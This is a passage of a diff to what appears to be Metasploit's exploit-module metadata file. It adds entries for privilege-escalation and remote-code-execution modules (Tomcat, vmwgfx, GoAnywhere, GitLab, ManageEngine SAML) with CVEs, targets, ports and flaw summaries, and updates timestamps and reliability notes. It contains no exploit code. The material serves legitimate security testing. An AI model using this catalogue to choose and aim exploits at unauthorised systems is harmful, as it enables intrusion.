    "ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -74589,7 +75608,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_sudo_token_priv_esc",
@@ -74638,7 +75657,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-11-12 16:19:50 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74743,7 +75762,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -74800,7 +75819,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
@@ -74860,7 +75879,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/recvmmsg_priv_esc",
@@ -74905,7 +75924,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
@@ -75009,7 +76028,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -75067,7 +76086,7 @@
    "targets": [
      "Linux x86"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/sock_sendpage.rb",
    "is_install_path": true,
    "ref_name": "linux/local/sock_sendpage",
@@ -75147,7 +76166,7 @@
    "author": [
      "Gavin Youker <youkergav@gmail.com>"
    ],
-    "description": "This module attempts to create a new login session by\n            invoking the su command of a valid username and password.\n\n            If the login is successful, a new session is created via\n            the specified payload.\n\n            Because su forces passwords to be passed over stdin, this\n            module attempts to invoke a psuedo-terminal with python,\n            python3, or script.",
+    "description": "This module attempts to create a new login session by\n          invoking the su command of a valid username and password.\n\n          If the login is successful, a new session is created via\n          the specified payload.\n\n          Because su forces passwords to be passed over stdin, this\n          module attempts to invoke a psuedo-terminal with python,\n          python3, or script.",
    "references": [

    ],
@@ -75164,7 +76183,7 @@
      "Linux x86",
      "Linux x86_64"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/local/su_login.rb",
    "is_install_path": true,
    "ref_name": "linux/local/su_login",
@@ -75172,6 +76191,16 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": [
      "shell",
@@ -75235,7 +76264,7 @@
      "Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)",
      "Manual"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/linux/local/sudo_baron_samedit.rb",
    "is_install_path": true,
    "ref_name": "linux/local/sudo_baron_samedit",
@@ -75300,7 +76329,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -75324,6 +76353,64 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/tomcat_ubuntu_log_init_priv_esc": {
+    "name": "Apache Tomcat on Ubuntu Log Init Privilege Escalation",
+    "fullname": "exploit/linux/local/tomcat_ubuntu_log_init_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2016-09-30",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Dawid Golunski <dawid@legalhackers.com>"
+    ],
+    "description": "Tomcat (6, 7, 8) packages provided by default repositories on Debian-based\n          distributions (including Debian, Ubuntu etc.) provide a vulnerable\n          tomcat init script that allows local attackers who have already gained access\n          to the tomcat account (for example, by exploiting an RCE vulnerability\n          in a java web application hosted on Tomcat, uploading a webshell etc.) to\n          escalate their privileges from tomcat user to root and fully compromise the\n          target system.\n\n          Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04",
+    "references": [
+      "EDB-40450",
+      "URL-https://ubuntu.com/security/notices/USN-3081-1",
+      "URL-http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html",
+      "CVE-2016-1240"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, python",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-05 08:15:38 +0000",
+    "path": "/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/tomcat_ubuntu_log_init_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/ubuntu_enlightenment_mount_priv_esc": {
    "name": "Ubuntu Enlightenment Mount Priv Esc",
    "fullname": "exploit/linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75355,7 +76442,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-12-01 14:34:09 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75515,7 +76602,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ufo_privilege_escalation",
@@ -75567,7 +76654,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-12-01 14:55:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -75632,7 +76719,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmware_alsa_config",
@@ -75763,6 +76850,62 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_linux/local/vmwgfx_fd_priv_esc": {
+    "name": "vmwgfx Driver File Descriptor Handling Priv Esc",
+    "fullname": "exploit/linux/local/vmwgfx_fd_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-01-28",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Mathias Krause"
+    ],
+    "description": "If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to\n          recover by deallocating the (already populated) file descriptor. This is\n          wrong, as the fd gets released via put_unused_fd() which shouldn't be used,\n          as the fd table slot was already populated via the previous call to\n          fd_install(). This leaves userland with a valid fd table entry pointing to\n          a free'd 'file' object.\n\n          We use this bug to overwrite a SUID binary with our payload and gain root.\n          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.\n\n          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.",
+    "references": [
+      "URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
+      "URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
+      "CVE-2022-22942"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-02 18:17:02 +0000",
+    "path": "/modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vmwgfx_fd_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/yum_package_manager_persistence": {
    "name": "Yum Package Manager Persistence",
    "fullname": "exploit/linux/local/yum_package_manager_persistence",
@@ -77284,7 +78427,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2021-11-18 16:33:52 +0000",
+    "mod_time": "2022-06-23 16:28:10 +0000",
    "path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -77643,7 +78786,7 @@
    "targets": [
      "TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
@@ -77651,6 +78794,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -78043,7 +79196,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-04-26 12:34:45 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_debian_sandbox_escape",
@@ -79187,7 +80340,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -79195,6 +80348,15 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -79232,7 +80394,7 @@
    "targets": [
      "Symantec Messaging Gateway 9.5"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/symantec_smg_ssh",
@@ -79240,6 +80402,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -79273,7 +80444,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/vmware_vdp_known_privkey",
@@ -79281,6 +80452,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -84085,7 +85265,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/exploits/multi/http/atutor_upload_traversal.rb",
    "is_install_path": true,
    "ref_name": "multi/http/atutor_upload_traversal",
@@ -84093,6 +85273,16 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": true
@@ -85201,7 +86391,7 @@
      "Spencer McIntyre",
      "jheysel-r7"
    ],
-    "description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n            access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s\n            implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n            vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.\n\n            This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n            is susceptible to the same issue.",
+    "description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n          access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s\n          implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n          vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.\n\n          This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n          is susceptible to the same issue.",
    "references": [
      "CVE-2021-35464",
      "URL-https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464",
@@ -85229,7 +86419,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2021-07-09 16:39:58 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cve_2021_35464_forgerock_openam",
@@ -85637,6 +86827,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/fortra_goanywhere_rce_cve_2023_0669": {
+    "name": "Fortra GoAnywhere MFT Unsafe Deserialization RCE",
+    "fullname": "exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-02-01",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes",
+      "Frycos (Florian Hauser)"
+    ],
+    "description": "This module exploits CVE-2023-0669, which is an object deserialization\n          vulnerability in Fortra GoAnywhere MFT.",
+    "references": [
+      "CVE-2023-0669",
+      "URL-https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis",
+      "URL-https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html"
+    ],
+    "platform": "Unix,Windows",
+    "arch": "cmd",
+    "rport": 8001,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Version 2 Encryption",
+      "Version 1 Encryption"
+    ],
+    "mod_time": "2023-02-09 23:06:59 +0000",
+    "path": "/modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/fortra_goanywhere_rce_cve_2023_0669",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/freenas_exec_raw": {
    "name": "FreeNAS exec_raw.php Arbitrary Command Execution",
    "fullname": "exploit/multi/http/freenas_exec_raw",
@@ -86240,7 +87492,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/multi/http/gitlab_file_read_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlab_file_read_rce",
@@ -86262,6 +87514,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gitlab_github_import_rce_cve_2022_2992": {
+    "name": "GitLab GitHub Repo Import Deserialization RCE",
+    "fullname": "exploit/multi/http/gitlab_github_import_rce_cve_2022_2992",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-06",
+    "type": "exploit",
+    "author": [
+      "William Bowling (vakzz)",
+      "Heyder Andrade <https://infosec.exchange/@heyder>",
+      "RedWay Security <https://infosec.exchange/@redway>"
+    ],
+    "description": "An authenticated user can import a repository from GitHub into GitLab.\n          If a user attempts to import a repo from an attacker-controlled server,\n          the server will reply with a Redis serialization protocol object in the nested\n          `default_branch`. GitLab will cache this object and\n          then deserialize it when trying to load a user session, resulting in RCE.",
+    "references": [
+      "URL-https://hackerone.com/reports/1679624",
+      "URL-https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992",
+      "URL-https://gitlab.com/gitlab-org/gitlab/-/issues/371884",
+      "CVE-2022-2992"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-02-14 15:26:01 +0000",
+    "path": "/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gitlab_github_import_rce_cve_2022_2992",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gitlab_shell_exec": {
    "name": "Gitlab-shell Code Execution",
    "fullname": "exploit/multi/http/gitlab_shell_exec",
@@ -88324,6 +89639,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966": {
+    "name": "ManageEngine ADSelfService Plus Unauthenticated SAML RCE",
+    "fullname": "exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-10",
+    "type": "exploit",
+    "author": [
+      "Khoa Dinh",
+      "horizon3ai",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploits an unauthenticated remote code execution vulnerability\n          that affects Zoho ManageEngine AdSelfService Plus versions 6210 and\n          below (CVE-2022-47966). Due to a dependency to an outdated library\n          (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n          code by providing a crafted `samlResponse` XML to the ADSelfService Plus\n          SAML endpoint. Note that the target is only vulnerable if it has been\n          configured with SAML-based SSO at least once in the past, regardless of\n          the current SAML-based SSO status.",
+    "references": [
+      "CVE-2022-47966",
+      "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
+      "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
+      "URL-https://github.com/horizon3ai/CVE-2022-47966",
+      "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 9251,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2023-01-30 12:18:08 +0000",
+    "path": "/modules/exploits/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/manageengine_auth_upload": {
    "name": "ManageEngine Multiple Products Authenticated File Upload",
    "fullname": "exploit/multi/http/manageengine_auth_upload",
@@ -88483,6 +89864,74 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966": {
+    "name": "ManageEngine ServiceDesk Plus Unauthenticated SAML RCE",
+    "fullname": "exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-10",
+    "type": "exploit",
+    "author": [
+      "Khoa Dinh",
+      "horizon3ai",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploits an unauthenticated remote code execution vulnerability\n          that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and\n          below (CVE-2022-47966). Due to a dependency to an outdated library\n          (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n          code by providing a crafted `samlResponse` XML to the ServiceDesk Plus\n          SAML endpoint. Note that the target is only vulnerable if it has been\n          configured with SAML-based SSO at least once in the past, regardless of\n          the current SAML-based SSO status.",
+    "references": [
+      "CVE-2022-47966",
+      "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
+      "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
+      "URL-https://github.com/horizon3ai/CVE-2022-47966",
+      "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-30 12:15:14 +0000",
+    "path": "/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/mantisbt_manage_proj_page_rce": {
    "name": "Mantis manage_proj_page PHP Code Execution",
    "fullname": "exploit/multi/http/mantisbt_manage_proj_page_rce",
@@ -93791,7 +95240,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2018-12-14 13:08:50 +0000",
+    "mod_time": "2022-12-30 12:29:14 +0000",
    "path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts2_namespace_ognl",
@@ -97569,7 +99018,7 @@
      "h00die <mike@stcyrsecurity.com>",
      "KotCzarny"
    ],
-    "description": "This module attempts to exploit a debug backdoor privilege escalation in\n          Allwinner SoC based devices.\n          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n          Vulnerable OS: all OS images available for Orange Pis,\n                         any for FriendlyARM's NanoPi M1,\n                         SinoVoip's M2+ and M3,\n                         Cuebietech's Cubietruck +\n                         Linksprite's pcDuino8 Uno\n          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
+    "description": "This module attempts to exploit a debug backdoor privilege escalation in\n          Allwinner SoC based devices.\n\n          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.\n\n          Vulnerable OS: all OS images available for Orange Pis,\n          any for FriendlyARM's NanoPi M1,\n          SinoVoip's M2+ and M3,\n          Cuebietech's Cubietruck +\n          Linksprite's pcDuino8 Uno.\n          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.",
    "references": [
      "CVE-2016-10225",
      "URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
@@ -97588,7 +99037,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
    "is_install_path": true,
    "ref_name": "multi/local/allwinner_backdoor",
@@ -97596,6 +99045,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -97617,7 +99075,7 @@
      "Romain Trouve",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on systems running\n        MagniComp SysInfo versions prior to 10-H64.\n\n        The .mcsiwrapper suid executable allows loading a config file using the\n        '--configfile' argument. The 'ExecPath' config directive is used to set\n        the executable load path. This module abuses this functionality to set\n        the load path resulting in execution of arbitrary code as root.\n\n        This module has been tested successfully with SysInfo version\n        10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n        Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
+    "description": "This module attempts to gain root privileges on systems running\n          MagniComp SysInfo versions prior to 10-H64.\n\n          The .mcsiwrapper suid executable allows loading a config file using the\n          '--configfile' argument. The 'ExecPath' config directive is used to set\n          the executable load path. This module abuses this functionality to set\n          the load path resulting in execution of arbitrary code as root.\n\n          This module has been tested successfully with SysInfo version\n          10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n          Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
    "references": [
      "CVE-2017-6516",
      "BID-96934",
@@ -97639,7 +99097,7 @@
      "Solaris",
      "Linux"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
@@ -97652,6 +99110,9 @@
      ],
      "Stability": [
        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
      ]
    },
    "session_types": [
@@ -97757,7 +99218,7 @@
      "Linux x64",
      "Linux x86"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
    "is_install_path": true,
    "ref_name": "multi/local/xorg_x11_suid_server",
@@ -97765,6 +99226,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
    },
    "session_types": [
      "shell",
@@ -97785,7 +99256,7 @@
      "Narendra Shinde",
      "Aaron Ringo"
    ],
-    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n        versions 1.19.0 < 1.20.3.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg.  This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with CentOS 7 (1708).\n        CentOS default install will require console auth for the users session.\n        Xorg must have SUID permissions and may not start if running.\n\n        On successful exploitation artifacts will be created consistant\n        with starting Xorg.",
